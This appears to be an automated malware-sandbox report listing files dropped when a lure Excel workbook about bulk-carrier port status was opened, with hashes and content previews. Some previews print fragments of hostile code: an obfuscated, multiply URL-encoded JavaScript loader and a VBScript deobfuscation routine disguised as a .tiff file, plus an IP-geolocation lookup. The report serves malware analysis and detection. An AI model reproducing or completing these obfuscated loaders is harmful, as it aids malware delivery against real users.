                                                                                                            Preview:<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%20code%20by%20https%3A//www.html-code-generator.com%20--%3E%0Adocument.write%28unescape%28%27%253C%2573%2563%2572%2569%2570%2574%253E%250A%253C%2521%252D%252D%2520%2563%256F%2564%2565%2520%2562%2579%2520%2568%2574%2574%2570%2573%253A%252F%252F%2577%2577%2577%252E%2568%2574%256D%256C%252D%2563%256F%2564%2565%252D%2567%2565%256E%2565%2572%2561%2574%256F%2572%252E%2563%256F%256D%2520%252D%252D%253E%250A%2564%256F%2563%2575%256D%2565%256E%2574%252E%2577%2572%2569%2574%2565%2528%2575%256E%2565%2573%2563%2561%2570%2565%2528%2527%2525%2533%2543%2525%2532%2531%2525%2534%2534%2525%2534%2546%2525%2534%2533%2525%2535%2534%2525%2535%2539%2525%2535%2530%2525%2534%2535%2525%2532%2530%2525%2536%2538%2525%2537%2534%2525%2536%2544%2525%2536%2543%2525%2533%2545%2525%2530%2541%2525%2533%2543%2525%2536%2544%2525%2536%2535%2525%2537%2534%2525%2536%2531%2525%2532%2530%2525%2536%2538%2525%2537%2534%2525%2537%2534%2525%2537%2530%2525%2532%2544%2525%2536%2

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seehavingfacingbestthignstogetmebackwithentiretimegreat[1].tiff

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (376), with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):142466
                                                                                                            Entropy (8bit):3.674082413060924
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:41jUPF8/vqjQ2AMYdCZc1uIj9X0EBz4jfOMaTUfgt5pzGGwm:VdkvqjQ2ArCjIB0k4jfOMaTsgt5pCGwm
                                                                                                            MD5:DA5A2B2A39D7AB8B9F9ADF8AF69A5F61
                                                                                                            SHA1:7588E7A25BF351AC5A16ECA9B68686C7970E60E5
                                                                                                            SHA-256:99D85E0AB098EFE5FF79ED0F26F5543BE8D9DC316132A80BA72001CCA355E89F
                                                                                                            SHA-512:D042E1BA33995BA500DD91218AAAB47310B31AEFA91862F744719EA659EB235080DE25649E50AED2ECE84C1AFF78C25BEE6B8DBE5C680AFFA925516F61F95D8A
                                                                                                            Malicious:false
                                                                                                            Preview:..........F.u.n.c.t.i.o.n. .r.e.s.t.i.v.o.(.B.y.V.a.l. .a.m.b.a.r.i.n.o.,. .B.y.V.a.l. .p.n.e.o.m.e.t.r.i.a.,. .B.y.V.a.l. .c.o.n.t.r.a.m.a.r.t.e.l.o.s.)..... . . . .D.i.m. .e.s.f.a.l.f.a.m.e.n.t.o..... . . . .e.s.f.a.l.f.a.m.e.n.t.o. .=. .I.n.S.t.r.(.a.m.b.a.r.i.n.o.,. .p.n.e.o.m.e.t.r.i.a.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .e.s.f.a.l.f.a.m.e.n.t.o. .>. .0..... . . . . . . . .a.m.b.a.r.i.n.o. .=. .L.e.f.t.(.a.m.b.a.r.i.n.o.,. .e.s.f.a.l.f.a.m.e.n.t.o. .-. .1.). .&. .c.o.n.t.r.a.m.a.r.t.e.l.o.s. .&. .M.i.d.(.a.m.b.a.r.i.n.o.,. .e.s.f.a.l.f.a.m.e.n.t.o. .+. .L.e.n.(.p.n.e.o.m.e.t.r.i.a.).)..... . . . . . . . .e.s.f.a.l.f.a.m.e.n.t.o. .=. .I.n.S.t.r.(.e.s.f.a.l.f.a.m.e.n.t.o. .+. .L.e.n.(.c.o.n.t.r.a.m.a.r.t.e.l.o.s.).,. .a.m.b.a.r.i.n.o.,. .p.n.e.o.m.e.t.r.i.a.)..... . . . .L.o.o.p..... . . . ..... . . . .r.e.s.t.i.v.o. .=. .a.m.b.a.r.i.n.o.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json

                                                                                                            Download File
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):962
                                                                                                            Entropy (8bit):5.015105568788186
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:tkluQ+nd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qluQydRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                            MD5:8937B63DC0B37E949F38E7874886D999
                                                                                                            SHA1:62FD17BF5A029DDD3A5CFB4F5FC9FE83A346FFFC
                                                                                                            SHA-256:AB2F31E4512913B1E7F7ACAB4B72D6E741C960D0A482F09EA6F9D96FED842A66
                                                                                                            SHA-512:077176C51DC10F155EE08326270C1FE3E6CF36C7ABA75611BDB3CCDA2526D6F0360DBC2FBF4A9963051F0F01658017389FD898980ACF7BB3B29B287F188EE7B9
                                                                                                            Malicious:false
                                                                                                            Preview:{. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C8746C0.emf

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                            Category:dropped
                                                                                                            Size (bytes):7440
                                                                                                            Entropy (8bit):5.6312448977812695
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:PV1Ipi7blJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHDx:PVxvTNAK4oOIGbK1RvVwPAWmOHDx
                                                                                                            MD5:DEA1DEA8BEA479821FA2AC1C565B6E56
                                                                                                            SHA1:86865637336A9FEFA98AC5ABD189A848BE8852D4
                                                                                                            SHA-256:64832E2264B5A851EE2CC7E048DA437D6F41B1C3DCAA385971DAA1B502A11125
                                                                                                            SHA-512:1E1858F58748BF88DAB254F524943AC2C8576B4546AA67E37DFFE8917396A1CCCBA3964554AA77C599DD1CA184A56B8AFC3406A14C880A1B88D163EB04BACA1C
                                                                                                            Malicious:false
                                                                                                            Preview:....l........... ...<...........w....... EMF................................8...X....................?..............................@...C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.......d............................Xt....\.............L...7.Xt........].v?.Xt......Xt.......w8.....9............w....$.......d...........*XYt.....XYtH...8....d....9.-...4...6=.w................<.fv.[Sw....X..V..............................Twdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33602862.emf

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                            Category:dropped
                                                                                                            Size (bytes):3191264
                                                                                                            Entropy (8bit):2.0118490192617995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:nA0Ki15RlURvLuky+NkuCVAKERludvLuk0Vgk9CVnOKAOK1:P5RlMHk5ERlyDkr8a
                                                                                                            MD5:04A17584C7203C47419D4AC2163B98C6
                                                                                                            SHA1:485E17A82AE4672AC8D4B542CA0F509B80C0C4DF
                                                                                                            SHA-256:EBA2B7C929B2EAA16FB1F733B7ACDDDFD80635A7211B3FBE400FF2796C17827E
                                                                                                            SHA-512:043092951F27E81FF96DA084E8112107D6F00DAEE83ADA80132BEC696E56309D16FDDED39F7F3810CA58BB6357CC6A75718CDD2F7B4342CF82D0421B7681A88C
                                                                                                            Malicious:false
                                                                                                            Preview:....l...........@................S...".. EMF.....0.....#...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......<.......m.......<.......2...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67917077.emf

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1504468
                                                                                                            Entropy (8bit):1.7693060102813485
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:L+6i9zy7v2/uEB1A/meRlmRYT9FANxg2WUZUKdRLuk0VgHPLk9CVi:LKERludvLuk0Vgk9CVi
                                                                                                            MD5:EF3C18CC49B02153C770DB977B2E7435
                                                                                                            SHA1:D436E0F820DDBBA10DB4D3F1243ED3AA6468C057
                                                                                                            SHA-256:F328FB5B6055B687344190BB13D8DD6CDF6EA76D4AAAE6C5112DEC1B32ACE3C2
                                                                                                            SHA-512:2081EF5EE87A360894B8726494F30DFEEFF7D922E733D2E633A3D010DE56C6A4CAEADEEBE4CD12A28658AE250ADE3B093F2FAB032B92A31D511D9C99A12AF337
                                                                                                            Malicious:false
                                                                                                            Preview:....l...........I...R............:...).. EMF................................8...X....................?...........................................:...)..........J...S...Q...............I...R...................J...S...P...(...x........... ....:...)..(...J...S.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\79D883FE.emf

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1296688
                                                                                                            Entropy (8bit):3.5916724080620157
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:44oL3s01u2uIfTlw35Ydkndm9wHiT53ZkyOmCl6PV2yuxOKiOKC:obWQTi35RH1RW7vuZ
                                                                                                            MD5:2D3AE0FA9EAFCE304E2CD3E3B45AC0FF
                                                                                                            SHA1:5FC59DC274A81DBF0CCB3AFFEAD2B1AE2095531C
                                                                                                            SHA-256:C1133F5EFED7990EE2339FCE42ADE9B6CEF454B29616881D9E8605B8AD9D8C23
                                                                                                            SHA-512:58E62F40FBD670FBC931180871DF3313EB50A0BE4B1BA0DC19BBC52B7D2FFC9CD71834DAFDA7F285FAD60DE86D95D1248B5424C9CC53341B14EA3CC2450BE08A
                                                                                                            Malicious:false
                                                                                                            Preview:....l...........................6[...%.. EMF....0.......$.......................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......1.......Z.......1.......*...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD8B18FB.emf

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                            Category:dropped
                                                                                                            Size (bytes):3064680
                                                                                                            Entropy (8bit):1.8507381356738084
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:NaeRlcBvLukyV6kTCVQKERludvLuk0Vgk9CVX:oeRlM7kmERlyDku
                                                                                                            MD5:93774BB9AECD3837D6496AE965D1BD80
                                                                                                            SHA1:AE60D6A30E74BB5BE492CA71B82205D5C6B850C4
                                                                                                            SHA-256:6CDB58A3C6906A6DD49DB83340ACC7AF0B7C7BBA5C01D8B0A9F562AEBDC85897
                                                                                                            SHA-512:3810C4CDE003BAF916D626A41C0534BF421F5CDBF64D897F385FEDA36F556B6FECC27DB294A39F89C82DF0570424DE2EBB789E0B2294D42BFF80A64756257BD6
                                                                                                            Malicious:false
                                                                                                            Preview:....l............................]..WT.. EMF....h...........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................2......."...........!...............................................2......."...........!...............................................2......."...........!...............................................2.......'.......................%...........................................................L...d.......L.......!.......L...........!..............?...........?................................L...d...y...Y...........y...Y.......[...!..............?...........?................................'.......................%...................................&...

                                                                                                            C:\Users\user\AppData\Local\Temp\0r22czlu.zkp.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\0rf0iaok.led.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\4tvqhsdt.koz.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\PORTS SITUATION BULK CARRIERS.xlsx

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                            Category:dropped
                                                                                                            Size (bytes):24052
                                                                                                            Entropy (8bit):7.652425367216495
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:EaNYaTXe5BPJ2cpRYnyAt3TtsVaWtmGJA8+6qdPGlDLRoucPQFVJG:Ea6aje5BP7RMYt9h44wQFV4
                                                                                                            MD5:AE24ADB29E22854D176245019B60E937
                                                                                                            SHA1:28E9F74782AA0D138EE52E3191248F827BF27A1D
                                                                                                            SHA-256:5BF5C455288A0B5184B23744506939B604BF402E346AFAE18269BBE888412129
                                                                                                            SHA-512:10AE2624E874CBA663DA08AA0C0FEBE19421FD01F72D54957F22A028A58A33BD4078C6A9CCA7CDAB94FC59030894BEA018141E6920AF4E926155C7EE49B6507D
                                                                                                            Malicious:false
                                                                                                            Preview:PK..........!.*.B.....@.......[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.0..W.."o.....U.aAaY...`.5~...3....3*(ME3.Dy..|..W[...hch.y........V.z../E...Q..h..P\..,.w.....[....R...+lb.._..."~.k...5....1....`....t..Qu...{%O6..z._.j.J.Y....`>.......g..S.e.. .-3.. bc(.jy..5P.L?.g..u......{.%b..ZP.N..s........G....s..6....`o.N0.........|.<FTM.=..k...7.N.4......p..sL(....@....N...,.s......C.Q........?........:.r...=;q.G....`..O...G.O.)..N...A...i.....o.......PK..........!...%S............_rels/.rels ...(.................................

                                                                                                            C:\Users\user\AppData\Local\Temp\PORTS SITUATION BULK CARRIERS.xlsx:Zone.Identifier

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:gAWY3n:qY3n
                                                                                                            MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                                                            SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                                                            SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                                                            SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                                                            Malicious:false
                                                                                                            Preview:[ZoneTransfer]..ZoneId=3..

                                                                                                            C:\Users\user\AppData\Local\Temp\RES1F34.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 20 15:58:00 2024, 1st section name ".debug$S"
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1328
                                                                                                            Entropy (8bit):3.985420906621664
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:H+e9EurUfGtdHFwKdNWI+ycuZhNgakSsPNnqSqd:rrUe7GKd41ulga38qSK
                                                                                                            MD5:62DBA3F12F44BC72E408A860C5E5C2BC
                                                                                                            SHA1:3A493861CCA82D52D4BC5138C30C68B41C373781
                                                                                                            SHA-256:8F78E0D21BA155D757A2C273CC25B8323F811ACE540607EEFBDCCDAB43C1F9B6
                                                                                                            SHA-512:9D6AB09520D24B1FA35BC88A446045A29FF65F83E9C75928924E88ECCB8F4E6A80ED4DF2E6548BC139F314AFA9E22C022A0B1817585711E272154957250671E2
                                                                                                            Malicious:false
                                                                                                            Preview:L.....>g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\xijxxvat\CSCB7FD98358CD1456E9F7F690FA2FF526.TMP.................E..r...t.oK..n...........4.......C:\Users\user\AppData\Local\Temp\RES1F34.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.i.j.x.x.v.a.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                                            C:\Users\user\AppData\Local\Temp\RESB76D.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 20 15:57:33 2024, 1st section name ".debug$S"
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1328
                                                                                                            Entropy (8bit):4.004496986956877
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:HIe9E2UT8ndH8wKdNWI+ycuZhNOCPakSBCoPNnqSqd:wTkjKd41ulOoa3BnqSK
                                                                                                            MD5:D23B5631B68D9489B09E847123DE4AF7
                                                                                                            SHA1:61AECEC2228186004976B5DF7F85BCB426DEF0B4
                                                                                                            SHA-256:EFADE8FB96E32274C68083C19586F6BD771C19771BA134754A3D092E399429EE
                                                                                                            SHA-512:A0BCE3EE53085A70ED1548EC19AC84E2B017928E1B2D77A0D78C23BD2A824D4AAE36A97E1CF1D6801CF6AC63CBD61B6CCF28769E6056C73EB403C8F172F80B2F
                                                                                                            Malicious:false
                                                                                                            Preview:L.....>g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\qvgum1lr\CSC3E3F8E93A6CD4B728B9027B482B0AFC2.TMP..................#....Gy.._x:..........4.......C:\Users\user\AppData\Local\Temp\RESB76D.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.v.g.u.m.1.l.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                                            C:\Users\user\AppData\Local\Temp\ayj54ozr.0ba.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\bxaohfbf.wp4.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\cww1w05q.zch.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\dbmivtth.p1c.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\hdfkhux0.j1l.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\idl0ksdl.di3.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\kfqeut3r.2su.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
